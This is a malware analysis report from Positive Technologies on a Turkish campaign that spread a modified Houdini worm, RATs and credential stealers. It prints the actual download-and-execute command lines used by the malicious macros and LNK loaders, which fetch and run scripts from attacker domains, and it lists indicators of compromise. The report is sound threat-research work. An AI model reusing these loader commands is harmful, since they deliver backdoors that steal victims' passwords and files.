The Positive Technologies Expert Security Center has detected a malicious campaign active since at least mid-January 2018. The operation most focused on users from Brazil, Germany, Hungary, Latvia, the Philippines, Turkey, United Kingdom, and the USA. The long operation included use of a number of tools and techniques for infecting and controlling victim PCs. Here we will detail the stages of infection, utilities and network infrastructure used, and the digital traces that put us on the spot as the alleged hacker.
Executive summary
- Attackers reworked and modernized a 10-year-old worm
- Unusual set of tools and extensive network infrastructure
- The main suspect is a Turkish freelancer
Payload delivery
Office documents
On April 5, 2019, as part of tracking new threats, specialists at the PT Expert Security Center investigated a suspicious Microsoft Office document. The file had the .docm extension (modern Microsoft Word format with support for macros). We also know that it:- Was created several days prior to detection (2019-03-31)
- Contained an image asking the user to enable macros
- Was created on a Turkish-language system (as indicated by values of metadata fields: "Konu Başlığı" / "Subject Heading" and "Konu Ba l , 1" / "Thread Title, 1"—as translated by Google Translate)
 |
| Figure 1. Typical message for tricking victims into enabling macros |
Shell ("pow" & "ershe" & "ll -comm" & "and ""$h1='e';&('i' + $h1 + 'x')('Import-Module BitsTransfer;Start-BitsTransf' + $h1 + 'r https://definebilimi.com/1/b12.js $env:t' + $h1 + 'mp\bb1.js;');Start-Process -WindowStyle hidden -FilePath 'cmd.exe' -ArgumentList '/c %systemroot%\system32\wscript %temp%\bb1.js'""")The reason for use of PowerShell as well as the unusual module for downloading files from the web server is to evade restrictions on opening and running untrusted programs.
There are some similar documents. One of them is a .doc file (old Microsoft Word format) with Turkish character code page. The macro works in a very similar way:
Shell "cmd.exe /c bitsadmin /transfer myjob /download /priority FOREGROUND https://definebilimi.com/up3e.js %temp%\o2.js & wscript.exe %temp%\o2.js", vbHide
Here the malware author is using the same BITS technique, but now with the help of the legitimate system utility bitsadmin. Note that both the document's creation date and the time of its detection on public sources point to the middle of July 2018. So the attacks have been in progress for around a year, at a minimum. The payload is downloaded from the same attacker server, and the approach to naming the JScript script is similar too.
A different document has the extension .rtf (Rich Text Format). The file has several embedded .xls (old Microsoft Excel format) documents with identical contents. The macro code is completely identical to that from the first document. This, as well as the identical values of the code page and HeadingPairs XML field, suggests a common author.
LNK shortcuts
Not only Office documents were used for initial infection. We found a few malicious .lnk (Windows Shell Link) files that, when run, triggered execution of the following command:C:\Windows\System32\cmd.exe /c powershell -command "$h1='e';&('i' + $h1 + 'x')('Import-Module BitsTransfer;Start-BitsTransf' + $h1 + 'r https://definebilimi.com/1/b12.js $env:t' + $h1 + 'mp\bb.js;')" & %systemroot%\system32\wscript %temp%\bb.js
The shortcuts were distributed during mid-March and late April 2019.
Their metadata contains the username win7-bilgisayar (in translation from Turkish: "win7-computer"), indicating the user of the system on which the shortcuts were created.
We can state with confidence that phishing emails were the most likely method used for delivering malicious files for initial infection.
The metamorphoses of Houdini
Minor differences aside, all the objects for the initial infection stage download and run the same JScript script. The file is not obfuscated or packed. The only step taken to confound analysis was use of random variable names. The script is a WSH backdoor with the following properties:- The C2 address and port are hard-coded.
- C2 is performed via HTTP POST requests.
- When the script starts, the string "is-bekle" (in translation from Turkish: "is-ready") is inserted in the URI field.
- The User-Agent field contains brief information about the system with a script-defined delineator (in this case, "<|>"):
- Hard disk serial number
- Username
- System version
- Script name
- Antivirus software name
- Value of the %ProgramData% environment variable
- Whether .NET Framework 4.5.2 is installed
- Wait time between requests
- Whether Java is installed
- It checks whether it is running in a Kaspersky Lab sandbox based on the hard disk serial number. If the number is a match, the script stops running.
- It gets and runs server commands, which include:
- Downloading a file from the server
- Uploading a file to the server
- Stealing the clipboard contents
- Stealing contents of a folder
- Getting information on current processes
- Running commands (cmd.exe)
- Taking and sending screenshots
- Extracting and sending stored Chrome and Opera passwords
 |
| Figure 2. Beginning of the JScript script downloaded from the attacker server |
 |
| Figure 3. Handling of JScript backdoor commands |
Attacker's server
According to Shodan as of April 30, 2019, the attacker's host was running an AppServ web server. The server was not locked down very well: for example, the phpinfo page (which displays configuration information of interest) was accessible. Analysis of the URLs used to download malware showed that the server has a public directory (./a) listing the attacker's other tools. |
| Figure 4. Home page of the attacker's server |
 |
| Figure 5. phpinfo page on the attacker's server |
 |
| Figure 6. Contents of publicly available directory on the attacker's server as of late April 2019 |
 |
| Figure 7. Contents of publicly available directory on the attacker's server as of late May 2019 |
Houdini JScript
Most of all, we found a large number of variations on the modified Houdini worm we just looked at. Changes in the script from version to version were small: changes in host names (husan2.ddns.net, ip1.bcorp.fun, ip1.qqww.eu), ports (86, 87), and variable names. Particular commands appeared or disappeared. One version was even embedded in a JScript scriptlet. |
| Figure 8. Houdini JScript in scriptlet form |
Bcorp JAR
This independently created lightweight backdoor, written in Java, uses TCP port 22122 for C2. Capabilities include:- Running commands in cmd.exe
- Determining the OS version
- Listing catalogs
- Uploading files
- Adding itself to the startup items folder and autostart registry key
This appears to be why the modified worm checks for the presence of Java on the system. But it is not clear why an additional backdoor would be needed if the first one has a wide range of functions.
Get-ChromeCreds
This PowerShell wrapper extracts browsing history, usernames, passwords, and cookies from Google Chrome. Some versions contain the library System.Data.SQLite.dll for x86 and x64 systems in base64 encoding; the other versions assume that the library will be present in the %APPDATA% folder. Provided as a plugin component for the main JScript backdoor.Start-KeyLogger
This PowerShell implementation of a simple container is also provided as a plugin component for the main JScript backdoor. |
| Figure 9. Code fragment from the PowerShell keylogger |
WebBrowserPassView
This utility from Nirsoft grabs usernames and passwords from popular browsers. The attackers used a specially tweaked version, having packed it with ASPack to complicate analysis or bypass signature detection.NetWire RAT
This publicly available commercial remote administration tool is used by a number of cybercrime groups. In this case, obfuscation was accomplished by packing the RAT in a .NET PE file and applying DeepSea 4.1.TCP Listen
This bare-bones GUI utility from AllScoop is used to test router and firewall settings. For each listener port it displays a string and ends the connection. |
| Figure 10. TCP Listen GUI |
LNK loader
This tool is similar to the ones described already. When run, it performs the following command:C:\Windows\System32\cmd.exe /v /c "set i=h&&ms!i!ta http://ip1.qqww.eu/1/f.htm"In this case the shortcut was created under another user (desktop-amkd3n3).
Script loaders
We have put all the loaders for the already-mentioned RATs in this group. They are all small (less than 1 KB each) and in various formats (such as .htm, .xsl, and .hta). They are written in various languages, both of the scripting variety (JScript, PowerShell) and compiled-on-the-fly (C#). Here are code fragments from a few samples: |
| Figure 11. Fragment of the .htm loader |
 |
| Figure 12. Fragment of the .xsl loader |
 |
| Figure 13. Fragment of the .ps1 loader |
Tiny PE loaders
Besides script loaders, we also found .NET PE files. These files, too, were small (up to 10 KB) but with similarly extensive functionality: |
| Figure 14. Sample of decompiled code from one of the PE loaders |
xRAT
An open-source remote administration tool. Many versions and modifications are available publicly. Written in C# with partial obfuscation.Bcorp panel and builder
Server-side component of the JScript backdoor. It also serves as the builder for the client side. A .NET PE, the component is not obfuscated or packed. The interface resembles that of a tweaked Houdini server. It can send commands plus additional components and plugins to an infected machine: Java environment, PowerShell scripts and Nirsoft utility to grab browser data, PowerShell keylogger scripts, and others. Note that the project is named BcorpRat, as can be seen in the title bar of the window in the following screenshot. The namespace of the source code contains "Btech" in its name—remember this detail for later. |
| Figure 15. JScript backdoor admin panel: main window |
 |
| Figure 16. JScript backdoor admin panel: client-side builder window |
Network infrastructure
Now we will pay a closer look at the addresses used for interaction with the attacker's malware. We will start with the domain definebilimi.com, with which the Office documents and LNK loaders communicate.definebilimi.com
The domain changed owners on January 16, 2018. (Incidentally, "define bilimi" means "treasure of science" in Turkish.) Below are some of the most interesting WHOIS tidbits from that time. |
| Table 1. Information about the registrant (owner) of definebilimi.com |
The history of NS servers for the domain is interesting:
 |
| Table 2. History of NS servers for definebilimi.com |
buhar.us
The history of this domain ("buhar" means "steam" in Turkish) starts on January 16, 2018, the same day as definebilimi.com. |
| Table 3. Information about the registrant (owner) of buhar.us |
bcorp.fun
Registered on March 23, 2019. The registration country is (yet again) Turkey and the client organization is "Bcorp." Not to mention that we see "bcorp" in the name of the domain itself—a string that should look familiar by now.husan2.ddns.net
The attacker used at least one unconventional way to handle hosting. Starting in mid-March 2019, we were able to record use of dynamic DNS servers. Such servers enable attackers to hide their IP addresses and keep their C2 alive for longer. The choice of names was somewhat predictable: a few months later we detected use of husan3.ddns.net, while husan.ddns.net was active as far back as April 2017.bkorp.xyz
Starting in early April, the hacker registered domains with anonymization from WhoisGuard, Inc., which is located in Panama. Some examples include bkorp.xyz, prntsrcn.com, and i37-imgur.com. The NS servers used link these domains to the other malicious ones.qqww.eu
This domain—like bcorp.fun—has the subdomain ip1. The registrant (Osbil Technology Ltd.) is supposedly located in Berlin. In reality, a company with the same name is located on the east coast of Cyprus in the city of Famagusta, in the partially recognized Turkish Republic of Northern Cyprus. The company's official site is hosted on a domain that acted as NS server for bcorp.fun from March to May 2019. We did not find any signs of compromise of the name servers. Because of the NS provider's configuration (with the provider's information replacing the client's in the registrant field) client information was hidden from public view. |
| Figure 17. Information about the registrant (owner) of qqww.eu |
IP addresses
For a fuller picture, we will give IP addresses with some of the domains corresponding to them at various points in time:- 5.255.63.12
- bcorp.fun
- husan.ddns.net
- husan2.ddns.net
- husan3.ddns.net
- qqww.eu
- 192.95.3.137
- bcorp.fun
- bkorp.xyz
- definebilimi.com
- i36-imgur.com
- i37-imgur.com
- i38-imgur.com
- i39-imgur.com
- prntsrcn.com
- qqww.eu
- bkorp.xyz
- buhar.us
On the trail of the hacker
Among the malicious tools and utilities found on the attacker's server, we uncovered a curious image: |
| Figure 18. Image file found on the attacker's web server |
We have not reduced the image size. The image is included here with the exact same dimensions as on the server.
Despite the poor image quality, we were able to establish that this is a screenshot of a transaction page on blockr.io. This was a dead end, but we started to look for any associations with the name of the image file (IMG_JPEG-0371e4dce3c8804f1543c3f0f309cc11.jpg). We uncovered an online scan result for a file that had the same name as the image. The analyzed object was a Windows shortcut similar to the ones discussed previously. Attached was an image containing the photo ID card of a Turkish citizen. The last name on the card (Yaman) matches one found repeatedly in the domain registration records.
 |
| Figure 19. ID card found with LNK loader |
hxxps://github.com/btechim/prntsrcn/blob/nm46ny/IMG-0371e4dce3c8804f1543c3f0f309cc11.jpg.lnk?raw=trueThe user's Github account is now blocked, but based on the URL we can deduce the user's handle (btechim) and the name of the project (prntsrcn). The project name matches the name of one of the domains used in the campaign (prntsrcn.com). The user handle contains "btech," which we saw in the software for the admin panels described already.
Searching for this same handle put us onto a freelancer hiring site. There we find a page for a freelancer in Turkey who has the same handle, along with confirmed phone number, mailing address, and Facebook profile. He is offering his services in the area of software development and cybersecurity.
 |
| Figure 20. The suspected attacker's page on a freelancer hiring site |
Conclusions
Positive Technologies tracked this malicious campaign of Turkish origin for several months. It is rare to see a single series of attacks combining both modern techniques and modified 10-year-old tools. The attacker employed a wide range of tools of diverse purpose, platform, and sophistication to obtain total control over victim PCs. He used a wide range of techniques to hide his identity when establishing network infrastructure. But it was not possible to account for everything—and so pride and a few slipups ultimately gave away the game. The research was sent to the Turkish Information Security Incident Response Center.Author: Aleksey Vishnyakov, Positive Technologies
IOCs
Office loaders
3305720da73efbcb7d25edbb7eff5a1a5b6d77f3e48e7723498ede5d5ba54f26
621a0133e28edec77a2d3e75115b8655
712e7ec49ad3b8c91b326b6d5ee8dcd8
731a3d72e3d36c2270c1d0711c73c301
929374b35a73c59fe97b336d0c414389
LNK loaders
3bc5d95e2bd2d52a300da9f3036f5b3b527069e966b4a854df35aef63f45986a
a4667e0b3bfaca0cda5c344f1475b8e0
Houdini JScript
04c2ad67de2cea3f247cf50c5e12e9695ab9176b9ed9f7a776ec82c412a89eab
84f0d098880747f417703f251a2e0d1c
94c6ba0d812b4daf214263fffc951a20
a52509a38846b55a524019f2f1a06ade
bf2fb6cdbc9fde99e186f01ad26f959f
c871091ce44594adbd6cf4388381e410
daf6a9eb55813d1a151695d33506179d
f010af1b330d00abb5149e9defdae6ee
ff924faeb9dfd7384c05abe855566fc9
Bcorp JAR
59978b5a9e4ab36da0f31a8f616cc9d3a7219da3b0c0730c476fe340dbf7e4e5
ddac55213089da9ef407bce05ebe653e
Get-ChromeCreds
11769e9f49123a2af00bd74453221c071a81c9119d7761535c198ddb761979b8
42a85849a591e65b0254d9bcbdf59f82
8e49263f33c53ee5bc91bebbf9617352
c9ab090ad2badb9862fd5b6058428096
Start-KeyLogger
55daa84475a11ea656183e0ad5ccc608aa82fbb6a341d71d2431b6d2ebca027c
WebBrowserPassView
7722e086cf7ed59955a1d6ec26f49cf3NetWire RAT
1470a08bd427bb8738a254ba4f130ff55f8495016773c7834b1c588f0997a6c4
TCP Listen
913567da98185cad9f91a570dc298de1Script loaders
02946d10c6a34fe74826f3c0b0a6a3e01ad644bdba488a6e42ad76aea2c0ee54
3a2dcf36b9206a135daa73c645a3f56f
4dddd87d3cb80145c9859fd76dfef794
74c5e5be9f79bd9e7ee84fd046c14e68
78f4d5fa6c68dae4b03860b54ec6cc67
Tiny PE loaders
0f3c56018a7051aebe060454fc981f5b1b9cefc229daddc4557cea0e3bdf4656
29e6679107bd9c72aa061371082206bb
b66b7395825b9ed656b768d4e7fe1de7
fbc606b8b04e51ddb342e29b84ac1edb
xRAT
2e9a0637478938cc3e4519aa7b4219cc7c67c93ba243be32e5fd6a6921ceded3
Bcorp panel and builder
405c987ba1a8568e2808da2b06bc9047c3ac8b7a7c8c0d100e3c2af8ccd11441
Bcorp C2
bcorp.funbkorp.xyz
buhar.us
definebilimi.com
husan.ddns.net
husan2.ddns.net
husan3.ddns.net
i36-imgur.com
i37-imgur.com
i38-imgur.com
i39-imgur.com
prntsrcn.com
qqww.eu
5.255.63.12
192.95.3.137
192.95.3.140
Article Link: http://blog.ptsecurity.com/2019/12/turkish-tricks-with-worms-rats-and.html